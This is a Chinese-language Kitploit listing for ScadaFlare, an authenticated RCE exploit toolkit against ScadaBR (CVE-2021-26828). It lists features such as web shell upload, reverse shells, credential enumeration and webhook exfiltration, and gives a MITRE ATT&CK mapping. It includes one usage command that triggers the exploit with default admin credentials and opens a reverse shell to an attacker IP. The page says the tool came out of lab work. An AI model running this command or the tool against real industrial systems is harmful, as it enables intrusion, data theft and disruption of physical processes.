Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare 用于 ScadaBR 的认证 RCE 漏洞利用框架 (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
工具/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Payload生成漏洞分析漏洞利用SCADA/ICS安全Web应用程序漏洞利用信息收集渗透测试命令与控制红队
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare 用于 ScadaBR 的认证 RCE 漏洞利用框架 (CVE-2021-26828) OpenPLC ScadaBR

58个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

ScadaFlare - CVE-2021-26828 认证 RCE 利用工具包

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

一个针对 ScadaBR <1.1.0 的模块化认证后 RCE 利用工具,专为红队行动而增强。

ScadaFlare Demo

功能特性

  • 通过 view_edit.shtm 上传武器化的 .jsp shell
  • 支持 Linux 与 Windows 载荷
  • 支持 SOCKS5 / HTTP 代理
  • 反弹 shell 触发(标准或 base64)
  • 枚举模块(数据库、凭证、Log4Shell 等)
  • Webhook 外传(Slack / Discord)
  • 生成 Metasploit 资源脚本
  • 清理支持(kill switch)

MITRE ATT&CK 技术映射

CVE

  • CVE-2021-26828
  • 发现者:Fellipe Oliveira
  • 利用代码已增强并模块化

开发背景

此利用工具是在分析 HTB Pro Lab: Alchemy 场景期间开发的。Fellipe Oliveira 的原始 PoC 很扎实,但存在以下不足:

  • 使用 Python 2 编写
  • 缺乏代理支持、shell 清理、枚举链等现代功能
  • 难以扩展或集成到红队工作流程中

本版本 ScadaFlare 是使用 Python 3 的全面重写,具备模块化支持、多种规避策略、操作系统检测覆盖、Webhook 集成、SOCKS 代理支持,以及为真实操作人员使用而设计的枚举链。

使用方法

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

仅限合法与道德用途

ScadaFlare 的唯一设计用途是:

  • 道德黑客教育
  • SCADA 实验室测试
  • 防御性研究与漏洞验证

未经授权对真实工业系统使用可能导致:

  • 干扰物理过程
  • 造成损害或安全隐患
  • 导致严重的法律后果

使用此工具即表示你接受全部责任:

  • 获得明确的书面授权
  • 仅在经批准的环境中进行操作

许可证

MIT 许可证 – 请参阅 LICENSE

下载工具
阶段技术ID
初始访问(认证后)有效账户T1078
执行面向公众的应用利用T1190
命令执行Web ShellT1505.003
特权操作修改 Web 内容T1505
凭据访问配置文件中的凭据T1552.001
发现远程系统发现T1018
数据外传通过 Web 服务外传T1567.002
防御规避代理与协议隧道T1090